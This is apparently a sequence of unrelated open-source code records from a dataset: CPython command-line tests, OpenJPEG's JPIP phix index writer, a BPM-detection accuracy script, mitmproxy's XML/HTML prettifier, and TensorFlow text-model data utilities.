opts = eval(out.splitlines()[0])
self.assertEqual(opts, {'a': True, 'b': 'c,d=e'})
def test_run_module(self):
# Test expected operation of the '-m' switch
# Switch needs an argument
assert_python_failure('-m')
# Check we get an error for a nonexistent module
assert_python_failure('-m', 'fnord43520xyz')
# Check the runpy module also gives an error for
# a nonexistent module
assert_python_failure('-m', 'runpy', 'fnord43520xyz'),
# All good if module is located and run successfully
assert_python_ok('-m', 'timeit', '-n', '1'),
def test_run_module_bug1764407(self):
# -m and -i need to play well together
# Runs the timeit module and checks the __main__
# namespace has been populated appropriately
p = spawn_python('-i', '-m', 'timeit', '-n', '1')
p.stdin.write(b'Timer\n')
p.stdin.write(b'exit()\n')
data = kill_python(p)
self.assertTrue(data.find(b'1 loop') != -1)
self.assertTrue(data.find(b'__main__.Timer') != -1)
def test_run_code(self):
# Test expected operation of the '-c' switch
# Switch needs an argument
assert_python_failure('-c')
# Check we get an error for an uncaught exception
assert_python_failure('-c', 'raise Exception')
# All good if execution is successful
assert_python_ok('-c', 'pass')
@unittest.skipIf(sys.getfilesystemencoding() == 'ascii',
'need a filesystem encoding different than ASCII')
def test_non_ascii(self):
# Test handling of non-ascii data
if test.support.verbose:
import locale
print('locale encoding = %s, filesystem encoding = %s'
% (locale.getpreferredencoding(), sys.getfilesystemencoding()))
command = "assert(ord('\xe9') == 0xe9)"
assert_python_ok('-c', command)
# On Windows, pass bytes to subprocess doesn't test how Python decodes the
# command line, but how subprocess does decode bytes to unicode. Python
# doesn't decode the command line because Windows provides directly the
# arguments as unicode (using wmain() instead of main()).
@unittest.skipIf(sys.platform == 'win32',
'Windows has a native unicode API')
def test_undecodable_code(self):
undecodable = b"\xff"
env = os.environ.copy()
# Use C locale to get ascii for the locale encoding
env['LC_ALL'] = 'C'
code = (
b'import locale; '
b'print(ascii("' + undecodable + b'"), '
b'locale.getpreferredencoding())')
p = subprocess.Popen(
[sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
env=env)
stdout, stderr = p.communicate()
if p.returncode == 1:
# _Py_char2wchar() decoded b'\xff' as '\udcff' (b'\xff' is not
# decodable from ASCII) and run_command() failed on
# PyUnicode_AsUTF8String(). This is the expected behaviour on
# Linux.
pattern = b"Unable to decode the command from the command line:"
elif p.returncode == 0:
# _Py_char2wchar() decoded b'\xff' as '\xff' even if the locale is
# C and the locale encoding is ASCII. It occurs on FreeBSD, Solaris
# and Mac OS X.
pattern = b"'\\xff' "
# The output is followed by the encoding name, an alias to ASCII.
# Examples: "US-ASCII" or "646" (ISO 646, on Solaris).
else:
raise AssertionError("Unknown exit code: %s, output=%a" % (p.returncode, stdout))
if not stdout.startswith(pattern):
raise AssertionError("%a doesn't start with %a" % (stdout, pattern))
@unittest.skipUnless(sys.platform == 'darwin', 'test specific to Mac OS X')
def test_osx_utf8(self):
def check_output(text):
decoded = text.decode('utf8', 'surrogateescape')
expected = ascii(decoded).encode('ascii') + b'\n'
env = os.environ.copy()
# C locale gives ASCII locale encoding, but Python uses UTF-8
# to parse the command line arguments on Mac OS X
env['LC_ALL'] = 'C'
p = subprocess.Popen(
(sys.executable, "-c", "import sys; print(ascii(sys.argv[1]))", text),
stdout=subprocess.PIPE,
env=env)
stdout, stderr = p.communicate()
self.assertEqual(stdout, expected)
self.assertEqual(p.returncode, 0)
# test valid utf-8
text = 'e:\xe9, euro:\u20ac, non-bmp:\U0010ffff'.encode('utf-8')
check_output(text)
# test invalid utf-8
text = (
b'\xff' # invalid byte
b'\xc3\xa9' # valid utf-8 character
b'\xc3\xff' # invalid byte sequence
b'\xed\xa0\x80' # lone surrogate character (invalid)
)
check_output(text)
def test_unbuffered_output(self):
# Test expected operation of the '-u' switch
for stream in ('stdout', 'stderr'):
# Binary is unbuffered
code = ("import os, sys; sys.%s.buffer.write(b'x'); os._exit(0)"
% stream)
rc, out, err = assert_python_ok('-u', '-c', code)
data = err if stream == 'stderr' else out
self.assertEqual(data, b'x', "binary %s not unbuffered" % stream)
# Text is line-buffered
code = ("import os, sys; sys.%s.write('x\\n'); os._exit(0)"
% stream)
rc, out, err = assert_python_ok('-u', '-c', code)
data = err if stream == 'stderr' else out
self.assertEqual(data.strip(), b'x',
"text %s not line-buffered" % stream)
def test_unbuffered_input(self):
# sys.stdin still works with '-u'
code = ("import sys; sys.stdout.write(sys.stdin.read(1))")
p = spawn_python('-u', '-c', code)
p.stdin.write(b'x')
p.stdin.flush()
data, rc = _kill_python_and_exit_code(p)
self.assertEqual(rc, 0)
self.assertTrue(data.startswith(b'x'), data)
def test_large_PYTHONPATH(self):
path1 = "ABCDE" * 100
path2 = "FGHIJ" * 100
path = path1 + os.pathsep + path2
code = """if 1:
import sys
path = ":".join(sys.path)
path = path.encode("ascii", "backslashreplace")
sys.stdout.buffer.write(path)"""
rc, out, err = assert_python_ok('-S', '-c', code,
PYTHONPATH=path)
self.assertIn(path1.encode('ascii'), out)
self.assertIn(path2.encode('ascii'), out)
def test_displayhook_unencodable(self):
for encoding in ('ascii', 'latin1', 'utf8'):
env = os.environ.copy()
env['PYTHONIOENCODING'] = encoding
p = subprocess.Popen(
[sys.executable, '-i'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env)
# non-ascii, surrogate, non-BMP printable, non-BMP unprintable
text = "a=\xe9 b=\uDC80 c=\U00010000 d=\U0010FFFF"
p.stdin.write(ascii(text).encode('ascii') + b"\n")
p.stdin.write(b'exit()\n')
data = kill_python(p)
escaped = repr(text).encode(encoding, 'backslashreplace')
self.assertIn(escaped, data)
def check_input(self, code, expected):
with tempfile.NamedTemporaryFile("wb+") as stdin:
sep = os.linesep.encode('ASCII')
stdin.write(sep.join((b'abc', b'def')))
stdin.flush()
stdin.seek(0)
with subprocess.Popen(
(sys.executable, "-c", code),
stdin=stdin, stdout=subprocess.PIPE) as proc:
stdout, stderr = proc.communicate()
self.assertEqual(stdout.rstrip(), expected)
def test_stdin_readline(self):
# Issue #11272: check that sys.stdin.readline() replaces '\r\n' by '\n'
# on Windows (sys.stdin is opened in binary mode)
self.check_input(
"import sys; print(repr(sys.stdin.readline()))",
b"'abc\\n'")
def test_builtin_input(self):
# Issue #11272: check that input() strips newlines ('\n' or '\r\n')
self.check_input(
"print(repr(input()))",
b"'abc'")
def test_unmached_quote(self):
# Issue #10206: python program starting with unmatched quote
# spewed spaces to stdout
rc, out, err = assert_python_failure('-c', "'")
self.assertRegex(err.decode('ascii', 'ignore'), 'SyntaxError')
self.assertEqual(b'', out)
def test_stdout_flush_at_shutdown(self):
# Issue #5319: if stdout.flush() fails at shutdown, an error should
# be printed out.
code = """if 1:
import os, sys
sys.stdout.write('x')
os.close(sys.stdout.fileno())"""
rc, out, err = assert_python_ok('-c', code)
self.assertEqual(b'', out)
self.assertRegex(err.decode('ascii', 'ignore'),
'Exception IOError: .* ignored')
def test_closed_stdout(self):
# Issue #13444: if stdout has been explicitly closed, we should
# not attempt to flush it at shutdown.
code = "import sys; sys.stdout.close()"
rc, out, err = assert_python_ok('-c', code)
self.assertEqual(b'', err)
# Issue #7111: Python should work without standard streams
@unittest.skipIf(os.name != 'posix', "test needs POSIX semantics")
def _test_no_stdio(self, streams):
code = """if 1:
import os, sys
for i, s in enumerate({streams}):
if getattr(sys, s) is not None:
os._exit(i + 1)
os._exit(42)""".format(streams=streams)
def preexec():
if 'stdin' in streams:
os.close(0)
if 'stdout' in streams:
os.close(1)
if 'stderr' in streams:
os.close(2)
p = subprocess.Popen(
[sys.executable, "-E", "-c", code],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
preexec_fn=preexec)
out, err = p.communicate()
self.assertEqual(test.support.strip_python_stderr(err), b'')
self.assertEqual(p.returncode, 42)
def test_no_stdin(self):
self._test_no_stdio(['stdin'])
def test_no_stdout(self):
self._test_no_stdio(['stdout'])
def test_no_stderr(self):
self._test_no_stdio(['stderr'])
def test_no_std_streams(self):
self._test_no_stdio(['stdin', 'stdout', 'stderr'])
def test_hash_randomization(self):
# Verify that -R enables hash randomization:
self.verify_valid_flag('-R')
hashes = []
for i in range(2):
code = 'print(hash("spam"))'
rc, out, err = assert_python_ok('-R', '-c', code)
self.assertEqual(rc, 0)
hashes.append(out)
self.assertNotEqual(hashes[0], hashes[1])
# Verify that sys.flags contains hash_randomization
code = 'import sys; print("random is", sys.flags.hash_randomization)'
rc, out, err = assert_python_ok('-R', '-c', code)
self.assertEqual(rc, 0)
self.assertIn(b'random is 1', out)
def test_main():
test.support.run_unittest(CmdLineTest)
test.support.reap_children()
if __name__ == "__main__":
test_main()
|
unknown
|
codeparrot/codeparrot-clean
| ||
/*
* $Id: phix_manager.c 897 2011-08-28 21:43:57Z Kaori.Hagihara@gmail.com $
*
* Copyright (c) 2002-2014, Universite catholique de Louvain (UCL), Belgium
* Copyright (c) 2002-2014, Professor Benoit Macq
* Copyright (c) 2003-2004, Yannick Verschueren
* Copyright (c) 2010-2011, Kaori Hagihara
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS `AS IS'
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*/
/*! \file
* \brief Modification of jpip.c from 2KAN indexer
*/
#include "opj_includes.h"
/*
* Write faix box of phix
*
* @param[in] coff offset of j2k codestream
* @param[in] compno component number
* @param[in] cstr_info codestream information
* @param[in] EPHused true if if EPH option used
* @param[in] j2klen length of j2k codestream
* @param[in] cio file output handle
* @return length of faix box
*/
int opj_write_phix(int coff, opj_codestream_info_t cstr_info, OPJ_BOOL EPHused,
int j2klen, opj_stream_private_t *cio,
opj_event_mgr_t * p_manager)
{
OPJ_BYTE l_data_header [8];
OPJ_UINT32 len, compno, i;
opj_jp2_box_t *box;
OPJ_OFF_T lenp = 0;
box = (opj_jp2_box_t *)opj_calloc((size_t)cstr_info.numcomps,
sizeof(opj_jp2_box_t));
if (box == NULL) {
return 0;
}
for (i = 0; i < 2; i++) {
if (i) {
opj_stream_seek(cio, lenp, p_manager);
}
lenp = opj_stream_tell(cio);
opj_stream_skip(cio, 4, p_manager); /* L [at the end] */
opj_write_bytes(l_data_header, JPIP_PHIX, 4); /* PHIX */
opj_stream_write_data(cio, l_data_header, 4, p_manager);
opj_write_manf((int)i, cstr_info.numcomps, box, cio, p_manager);
for (compno = 0; compno < (OPJ_UINT32)cstr_info.numcomps; compno++) {
box[compno].length = (OPJ_UINT32)opj_write_phixfaix(coff, (int)compno,
cstr_info, EPHused, j2klen, cio, p_manager);
box[compno].type = JPIP_FAIX;
}
len = (OPJ_UINT32)(opj_stream_tell(cio) - lenp);
opj_stream_seek(cio, 4, p_manager);
opj_write_bytes(l_data_header, len, 4); /* L */
opj_stream_write_data(cio, l_data_header, 4, p_manager);
opj_stream_seek(cio, lenp + len, p_manager);
}
opj_free(box);
return (int)len;
}
int opj_write_phixfaix(int coff, int compno, opj_codestream_info_t cstr_info,
OPJ_BOOL EPHused, int j2klen, opj_stream_private_t *cio,
opj_event_mgr_t * p_manager)
{
OPJ_UINT32 tileno, version, i, nmax, size_of_coding; /* 4 or 8 */
opj_tile_info_t *tile_Idx;
opj_packet_info_t packet;
int resno, precno, layno;
OPJ_UINT32 num_packet;
int numOfres, numOfprec, numOflayers;
OPJ_BYTE l_data_header [8];
OPJ_OFF_T lenp;
OPJ_UINT32 len;
packet.end_ph_pos = packet.start_pos = -1;
(void)EPHused; /* unused ? */
if (j2klen > pow(2, 32)) {
size_of_coding = 8;
version = 1;
} else {
size_of_coding = 4;
version = 0;
}
lenp = opj_stream_tell(cio);
opj_stream_skip(cio, 4, p_manager); /* L [at the end] */
opj_write_bytes(l_data_header, JPIP_FAIX, 4); /* FAIX */
opj_stream_write_data(cio, l_data_header, 4, p_manager);
opj_write_bytes(l_data_header, version, 1); /* Version 0 = 4 bytes */
opj_stream_write_data(cio, l_data_header, 1, p_manager);
nmax = 0;
for (i = 0; i <= (OPJ_UINT32)cstr_info.numdecompos[compno]; i++) {
nmax += (OPJ_UINT32)(cstr_info.tile[0].ph[i] * cstr_info.tile[0].pw[i] *
cstr_info.numlayers);
}
opj_write_bytes(l_data_header, nmax, size_of_coding); /* NMAX */
opj_stream_write_data(cio, l_data_header, size_of_coding, p_manager);
opj_write_bytes(l_data_header, (OPJ_UINT32)(cstr_info.tw * cstr_info.th),
size_of_coding); /* M */
opj_stream_write_data(cio, l_data_header, size_of_coding, p_manager);
for (tileno = 0; tileno < (OPJ_UINT32)(cstr_info.tw * cstr_info.th); tileno++) {
tile_Idx = &cstr_info.tile[ tileno];
num_packet = 0;
numOfres = cstr_info.numdecompos[compno] + 1;
for (resno = 0; resno < numOfres ; resno++) {
numOfprec = tile_Idx->pw[resno] * tile_Idx->ph[resno];
for (precno = 0; precno < numOfprec; precno++) {
numOflayers = cstr_info.numlayers;
for (layno = 0; layno < numOflayers; layno++) {
switch (cstr_info.prog) {
case OPJ_LRCP:
packet = tile_Idx->packet[((layno * numOfres + resno) * cstr_info.numcomps +
compno) * numOfprec + precno];
break;
case OPJ_RLCP:
packet = tile_Idx->packet[((resno * numOflayers + layno) * cstr_info.numcomps +
compno) * numOfprec + precno];
break;
case OPJ_RPCL:
packet = tile_Idx->packet[((resno * numOfprec + precno) * cstr_info.numcomps +
compno) * numOflayers + layno];
break;
case OPJ_PCRL:
packet = tile_Idx->packet[((precno * cstr_info.numcomps + compno) * numOfres +
resno) * numOflayers + layno];
break;
case OPJ_CPRL:
packet = tile_Idx->packet[((compno * numOfprec + precno) * numOfres + resno) *
numOflayers + layno];
break;
default:
fprintf(stderr, "failed to ppix indexing\n");
}
opj_write_bytes(l_data_header, (OPJ_UINT32)(packet.start_pos - coff),
size_of_coding); /* start position */
opj_stream_write_data(cio, l_data_header, size_of_coding, p_manager);
opj_write_bytes(l_data_header,
(OPJ_UINT32)(packet.end_ph_pos - packet.start_pos + 1),
size_of_coding); /* length */
opj_stream_write_data(cio, l_data_header, size_of_coding, p_manager);
num_packet++;
}
}
}
/* PADDING */
while (num_packet < nmax) {
opj_write_bytes(l_data_header, 0,
size_of_coding); /* start position */
opj_stream_write_data(cio, l_data_header, size_of_coding, p_manager);
opj_write_bytes(l_data_header, 0,
size_of_coding); /* length */
opj_stream_write_data(cio, l_data_header, size_of_coding, p_manager);
num_packet++;
}
}
len = (OPJ_UINT32)(opj_stream_tell(cio) - lenp);
opj_stream_seek(cio, lenp, p_manager);
opj_write_bytes(l_data_header, len, 4); /* L */
opj_stream_write_data(cio, l_data_header, 4, p_manager);
opj_stream_seek(cio, lenp + len, p_manager);
return (int)len;
}
|
c
|
github
|
https://github.com/opencv/opencv
|
3rdparty/openjpeg/openjp2/phix_manager.c
|
#!/usr/bin/env python
import sys
import mar_collection
def exact_accuracy(bpm_detected, bpm_ground):
tolerance = 0.04
diff = abs(bpm_detected - bpm_ground)
if diff <= tolerance * bpm_ground:
return True
return False
def major_extended_harmonic_accuracy(bpm_detected, bpm_ground):
tolerance = 0.04
m = 1
cand = bpm_ground*m
while cand < 1000:
cand = bpm_ground*m
diff = abs(bpm_detected - cand)
if diff <= tolerance * bpm_ground:
return True
m += 1
return False
def extended_harmonic_accuracy(bpm_detected, bpm_ground):
tolerance = 0.04
for m in [1, 2, 3]:
#for m in [1, 2, 3]:
diff = abs(m*bpm_detected - bpm_ground)
if diff <= tolerance * bpm_ground:
return True
diff = abs(1.0/m*bpm_detected - bpm_ground)
if diff <= tolerance * bpm_ground:
return True
return False
def process_mfs(ground_mf, detected_mf, limit=None):
# load ground truth
ground_coll = mar_collection.MarCollection(ground_mf)
ground_bpms = {}
for dat in ground_coll.data:
filename = dat[0]
bpm_ground = float(dat[1])
ground_bpms[filename] = bpm_ground
user_coll = mar_collection.MarCollection(detected_mf)
good = 0
i = 0
for dat in user_coll.data:
#for dat in user_coll.data[:5]:
filename = dat[0]
cand_bpms = dat[1]
bpm_ground = ground_bpms[filename]
if "," in cand_bpms:
cand_bpms = [float(a) for a in cand_bpms.split(',')]
correct = False
if limit is not None and limit is not 0:
cand_bpms = cand_bpms[:limit]
if limit == 0:
for bpm_detected in cand_bpms[:1]:
corr = exact_accuracy(bpm_detected, bpm_ground)
if corr:
correct = True
if correct:
good += 1
i += 1
else:
for bpm_detected in cand_bpms:
corr = extended_harmonic_accuracy(bpm_detected, bpm_ground)
if corr:
correct = True
if correct:
good += 1
i += 1
#print cand_bpms
#print "Accuracy: %.2f (%i/%i)" % (100*float(good) / i, good, i)
accuracy = 100*float(good) / len(user_coll.data)
return accuracy
if __name__ == "__main__":
ground_filename = sys.argv[1]
user_filename = sys.argv[2]
zero = process_mfs(ground_filename, user_filename, 0)
one = process_mfs(ground_filename, user_filename, 1)
two = process_mfs(ground_filename, user_filename, 2)
four = process_mfs(ground_filename, user_filename, 4)
eight = process_mfs(ground_filename, user_filename, 8)
print "%s\t%.1f\t%.1f\t%.1f\t%.1f\t%.1f" % (
user_filename, zero, one, two, four, eight)
|
unknown
|
codeparrot/codeparrot-clean
| ||
import io
import re
import textwrap
from typing import Iterable, Optional
from mitmproxy.contentviews import base
from mitmproxy.utils import sliding_window
"""
A custom XML/HTML prettifier. Compared to other prettifiers, its main features are:
- Implemented in pure Python.
- Modifies whitespace only.
- Works with any input.
- Lazy evaluation.
The implementation is split into two main parts: tokenization and formatting of tokens.
"""
# http://www.xml.com/pub/a/2001/07/25/namingparts.html - this is close enough for what we do.
REGEX_TAG = re.compile(r"[a-zA-Z0-9._:\-]+(?!=)")
# https://www.w3.org/TR/html5/syntax.html#void-elements
HTML_VOID_ELEMENTS = {
"area", "base", "br", "col", "embed", "hr", "img", "input", "keygen", "link", "meta", "param",
"source", "track", "wbr"
}
NO_INDENT_TAGS = {"xml", "doctype", "html"}
INDENT = 2
class Token:
def __init__(self, data):
self.data = data
def __repr__(self):
return "{}({})".format(
type(self).__name__,
self.data
)
class Text(Token):
@property
def text(self):
return self.data.strip()
class Tag(Token):
@property
def tag(self):
t = REGEX_TAG.search(self.data)
if t is not None:
return t.group(0).lower()
return "<empty>"
@property
def is_comment(self) -> bool:
return self.data.startswith("<!--")
@property
def is_cdata(self) -> bool:
return self.data.startswith("<![CDATA[")
@property
def is_closing(self):
return self.data.startswith("</")
@property
def is_self_closing(self):
return self.is_comment or self.is_cdata or self.data.endswith(
"/>") or self.tag in HTML_VOID_ELEMENTS
@property
def is_opening(self):
return not self.is_closing and not self.is_self_closing
@property
def done(self):
if self.is_comment:
return self.data.endswith("-->")
elif self.is_cdata:
return self.data.endswith("]]>")
else:
# This fails for attributes that contain an unescaped ">"
return self.data.endswith(">")
def tokenize(data: str) -> Iterable[Token]:
token: Token = Text("")
i = 0
def readuntil(char, start, include=1):
nonlocal i
end = data.find(char, start)
if end == -1:
end = len(data)
ret = data[i:end + include]
i = end + include
return ret
while i < len(data):
if isinstance(token, Text):
token.data = readuntil("<", i, 0)
if token.text:
yield token
token = Tag("")
elif isinstance(token, Tag):
token.data += readuntil(">", i, 1)
if token.done:
yield token
token = Text("")
if token.data.strip():
yield token
def indent_text(data: str, prefix: str) -> str:
# Add spacing to first line so that we dedent in cases like this:
# <li>This is
# example text
# over multiple lines
# </li>
dedented = textwrap.dedent(" " * 32 + data).strip()
return textwrap.indent(dedented, prefix[:32])
def is_inline_text(a: Optional[Token], b: Optional[Token], c: Optional[Token]) -> bool:
if isinstance(a, Tag) and isinstance(b, Text) and isinstance(c, Tag):
if a.is_opening and "\n" not in b.data and c.is_closing and a.tag == c.tag:
return True
return False
def is_inline(prev2: Optional[Token], prev1: Optional[Token], t: Optional[Token], next1: Optional[Token], next2: Optional[Token]) -> bool:
if isinstance(t, Text):
return is_inline_text(prev1, t, next1)
elif isinstance(t, Tag):
if is_inline_text(prev2, prev1, t) or is_inline_text(t, next1, next2):
return True
if isinstance(next1, Tag) and t.is_opening and next1.is_closing and t.tag == next1.tag:
return True # <div></div> (start tag)
if isinstance(prev1, Tag) and prev1.is_opening and t.is_closing and prev1.tag == t.tag:
return True # <div></div> (end tag)
return False
class ElementStack:
"""
Keep track of how deeply nested our document is.
"""
def __init__(self):
self.open_tags = []
self.indent = ""
def push_tag(self, tag: str):
if len(self.open_tags) > 16:
return
self.open_tags.append(tag)
if tag not in NO_INDENT_TAGS:
self.indent += " " * INDENT
def pop_tag(self, tag: str):
if tag in self.open_tags:
remove_indent = 0
while True:
t = self.open_tags.pop()
if t not in NO_INDENT_TAGS:
remove_indent += INDENT
if t == tag:
break
self.indent = self.indent[:-remove_indent]
else:
pass # this closing tag has no start tag. let's keep indentation as-is.
def format_xml(tokens: Iterable[Token]) -> str:
out = io.StringIO()
context = ElementStack()
for prev2, prev1, token, next1, next2 in sliding_window.window(tokens, 2, 2):
if isinstance(token, Tag):
if token.is_opening:
out.write(indent_text(token.data, context.indent))
if not is_inline(prev2, prev1, token, next1, next2):
out.write("\n")
context.push_tag(token.tag)
elif token.is_closing:
context.pop_tag(token.tag)
if is_inline(prev2, prev1, token, next1, next2):
out.write(token.data)
else:
out.write(indent_text(token.data, context.indent))
out.write("\n")
else: # self-closing
out.write(indent_text(token.data, context.indent))
out.write("\n")
elif isinstance(token, Text):
if is_inline(prev2, prev1, token, next1, next2):
out.write(token.text)
else:
out.write(indent_text(token.data, context.indent))
out.write("\n")
else: # pragma: no cover
raise RuntimeError()
return out.getvalue()
class ViewXmlHtml(base.View):
name = "XML/HTML"
content_types = ["text/xml", "text/html"]
def __call__(self, data, **metadata):
# TODO:
# We should really have the message text as str here,
# not the message content as bytes.
# https://github.com/mitmproxy/mitmproxy/issues/1662#issuecomment-266192578
data = data.decode("utf8", "xmlcharrefreplace")
tokens = tokenize(data)
# TODO:
# Performance: Don't render the whole document right away.
# Let's wait with this until we have a sequence-like interface,
# this thing is reasonably fast right now anyway.
pretty = base.format_text(format_xml(tokens))
if "html" in data.lower():
t = "HTML"
else:
t = "XML"
return t, pretty
|
unknown
|
codeparrot/codeparrot-clean
| ||
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities for generating/preprocessing data for adversarial text models."""
import operator
import os
import random
import re
# Dependency imports
import tensorflow as tf
EOS_TOKEN = '</s>'
# Data filenames
# Sequence Autoencoder
ALL_SA = 'all_sa.tfrecords'
TRAIN_SA = 'train_sa.tfrecords'
TEST_SA = 'test_sa.tfrecords'
# Language Model
ALL_LM = 'all_lm.tfrecords'
TRAIN_LM = 'train_lm.tfrecords'
TEST_LM = 'test_lm.tfrecords'
# Classification
TRAIN_CLASS = 'train_classification.tfrecords'
TEST_CLASS = 'test_classification.tfrecords'
VALID_CLASS = 'validate_classification.tfrecords'
# LM with bidirectional LSTM
TRAIN_REV_LM = 'train_reverse_lm.tfrecords'
TEST_REV_LM = 'test_reverse_lm.tfrecords'
# Classification with bidirectional LSTM
TRAIN_BD_CLASS = 'train_bidir_classification.tfrecords'
TEST_BD_CLASS = 'test_bidir_classification.tfrecords'
VALID_BD_CLASS = 'validate_bidir_classification.tfrecords'
class ShufflingTFRecordWriter(object):
"""Thin wrapper around TFRecordWriter that shuffles records."""
def __init__(self, path):
self._path = path
self._records = []
self._closed = False
def write(self, record):
assert not self._closed
self._records.append(record)
def close(self):
assert not self._closed
random.shuffle(self._records)
with tf.python_io.TFRecordWriter(self._path) as f:
for record in self._records:
f.write(record)
self._closed = True
def __enter__(self):
return self
def __exit__(self, unused_type, unused_value, unused_traceback):
self.close()
class Timestep(object):
"""Represents a single timestep in a SequenceWrapper."""
def __init__(self, token, label, weight, multivalent_tokens=False):
"""Constructs Timestep from empty Features."""
self._token = token
self._label = label
self._weight = weight
self._multivalent_tokens = multivalent_tokens
self._fill_with_defaults()
@property
def token(self):
if self._multivalent_tokens:
raise TypeError('Timestep may contain multiple values; use `tokens`')
return self._token.int64_list.value[0]
@property
def tokens(self):
return self._token.int64_list.value
@property
def label(self):
return self._label.int64_list.value[0]
@property
def weight(self):
return self._weight.float_list.value[0]
def set_token(self, token):
if self._multivalent_tokens:
raise TypeError('Timestep may contain multiple values; use `add_token`')
self._token.int64_list.value[0] = token
return self
def add_token(self, token):
self._token.int64_list.value.append(token)
return self
def set_label(self, label):
self._label.int64_list.value[0] = label
return self
def set_weight(self, weight):
self._weight.float_list.value[0] = weight
return self
def copy_from(self, timestep):
self.set_token(timestep.token).set_label(timestep.label).set_weight(
timestep.weight)
return self
def _fill_with_defaults(self):
if not self._multivalent_tokens:
self._token.int64_list.value.append(0)
self._label.int64_list.value.append(0)
self._weight.float_list.value.append(0.0)
class SequenceWrapper(object):
"""Wrapper around tf.SequenceExample."""
F_TOKEN_ID = 'token_id'
F_LABEL = 'label'
F_WEIGHT = 'weight'
def __init__(self, multivalent_tokens=False):
self._seq = tf.train.SequenceExample()
self._flist = self._seq.feature_lists.feature_list
self._timesteps = []
self._multivalent_tokens = multivalent_tokens
@property
def seq(self):
return self._seq
@property
def multivalent_tokens(self):
return self._multivalent_tokens
@property
def _tokens(self):
return self._flist[SequenceWrapper.F_TOKEN_ID].feature
@property
def _labels(self):
return self._flist[SequenceWrapper.F_LABEL].feature
@property
def _weights(self):
return self._flist[SequenceWrapper.F_WEIGHT].feature
def add_timestep(self):
timestep = Timestep(
self._tokens.add(),
self._labels.add(),
self._weights.add(),
multivalent_tokens=self._multivalent_tokens)
self._timesteps.append(timestep)
return timestep
def __iter__(self):
for timestep in self._timesteps:
yield timestep
def __len__(self):
return len(self._timesteps)
def __getitem__(self, idx):
return self._timesteps[idx]
def build_reverse_sequence(seq):
"""Builds a sequence that is the reverse of the input sequence."""
reverse_seq = SequenceWrapper()
# Copy all but last timestep
for timestep in reversed(seq[:-1]):
reverse_seq.add_timestep().copy_from(timestep)
# Copy final timestep
reverse_seq.add_timestep().copy_from(seq[-1])
return reverse_seq
def build_bidirectional_seq(seq, rev_seq):
bidir_seq = SequenceWrapper(multivalent_tokens=True)
for forward_ts, reverse_ts in zip(seq, rev_seq):
bidir_seq.add_timestep().add_token(forward_ts.token).add_token(
reverse_ts.token)
return bidir_seq
def build_lm_sequence(seq):
"""Builds language model sequence from input sequence.
Args:
seq: SequenceWrapper.
Returns:
SequenceWrapper with `seq` tokens copied over to output sequence tokens and
labels (offset by 1, i.e. predict next token) with weights set to 1.0,
except for <eos> token.
"""
lm_seq = SequenceWrapper()
for i, timestep in enumerate(seq):
if i == len(seq) - 1:
lm_seq.add_timestep().set_token(timestep.token).set_label(
seq[i].token).set_weight(0.0)
else:
lm_seq.add_timestep().set_token(timestep.token).set_label(
seq[i + 1].token).set_weight(1.0)
return lm_seq
def build_seq_ae_sequence(seq):
"""Builds seq_ae sequence from input sequence.
Args:
seq: SequenceWrapper.
Returns:
SequenceWrapper with `seq` inputs copied and concatenated, and with labels
copied in on the right-hand (i.e. decoder) side with weights set to 1.0.
The new sequence will have length `len(seq) * 2 - 1`, as the last timestep
of the encoder section and the first step of the decoder section will
overlap.
"""
seq_ae_seq = SequenceWrapper()
for i in range(len(seq) * 2 - 1):
ts = seq_ae_seq.add_timestep()
if i < len(seq) - 1:
# Encoder
ts.set_token(seq[i].token)
elif i == len(seq) - 1:
# Transition step
ts.set_token(seq[i].token)
ts.set_label(seq[0].token)
ts.set_weight(1.0)
else:
# Decoder
ts.set_token(seq[i % len(seq)].token)
ts.set_label(seq[(i + 1) % len(seq)].token)
ts.set_weight(1.0)
return seq_ae_seq
def build_labeled_sequence(seq, class_label, label_gain=False):
"""Builds labeled sequence from input sequence.
Args:
seq: SequenceWrapper.
class_label: bool.
label_gain: bool. If True, class_label will be put on every timestep and
weight will increase linearly from 0 to 1.
Returns:
SequenceWrapper with `seq` copied in and `class_label` added as label to
final timestep.
"""
label_seq = SequenceWrapper(multivalent_tokens=seq.multivalent_tokens)
# Copy sequence without labels
seq_len = len(seq)
final_timestep = None
for i, timestep in enumerate(seq):
label_timestep = label_seq.add_timestep()
if seq.multivalent_tokens:
for token in timestep.tokens:
label_timestep.add_token(token)
else:
label_timestep.set_token(timestep.token)
if label_gain:
label_timestep.set_label(int(class_label))
weight = 1.0 if seq_len < 2 else float(i) / (seq_len - 1)
label_timestep.set_weight(weight)
